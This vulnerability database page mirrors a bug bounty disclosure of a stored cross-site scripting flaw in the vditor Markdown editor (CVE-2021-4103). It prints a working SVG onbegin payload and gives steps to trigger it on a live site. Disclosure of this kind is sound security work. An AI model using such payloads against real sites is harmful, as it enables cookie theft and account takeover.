Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrNing102267B980AF-7357-4879-9448-A926C6474225
HistoryDec 10, 2021 - 7:01 a.m.

Cross-site Scripting (XSS) - Stored in vanessa219/vditor

2021-12-1007:01:49
ning1022
www.huntr.dev
8
cross-site scripting
vulnerability
xss
editor
authentication
attack
cookie stealing
unauthorized access
bug bounty

EPSS

0.001

Percentile

21.4%

JSON

Description

the editor has XSS vulnerability

Proof of Concept

payload:

</a>
&lt;svg&gt;&lt;animate onbegin=alert(11) attributeName=x dur=1s&gt;

Open the editorhttps://ld246.com/guide/markdown, enter the payload, and trigger the XSS vulnerability

demo pic : https://drive.google.com/file/d/1fl07CUXSS0DyvjtuftslMnyr2uG_Z8F7/view?usp=sharing

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.

Related

veracode 1
osv 2
cve 1
cvelist 1
prion 1
github 1
cnvd 1
nvd 1
veracode
veracode
Cross-Site Scripting (XSS)
2022-01-24 08:05:01
osv
osv
CVE-2021-4103
2022-01-23 02:15:06
vditor Vulnerable to Cross-site Scripting in SVG events
2022-01-28 22:04:11
cve
cve
CVE-2021-4103
2022-01-23 02:15:06
cvelist
cvelist
CVE-2021-4103 Cross-site Scripting (XSS) - Stored in vanessa219/vditor
2022-01-23 01:45:11
prion
prion
Cross site scripting
2022-01-23 02:15:00
github
github
vditor Vulnerable to Cross-site Scripting in SVG events
2022-01-28 22:04:11
cnvd
cnvd
vditor cross-site scripting vulnerability
2022-01-25 00:00:00
nvd
nvd
CVE-2021-4103
2022-01-23 02:15:06

EPSS

0.001

Percentile

21.4%

JSON
Related for 67B980AF-7357-4879-9448-A926C6474225
veracode1osv2cve1cvelist1prion1github1cnvd1nvd1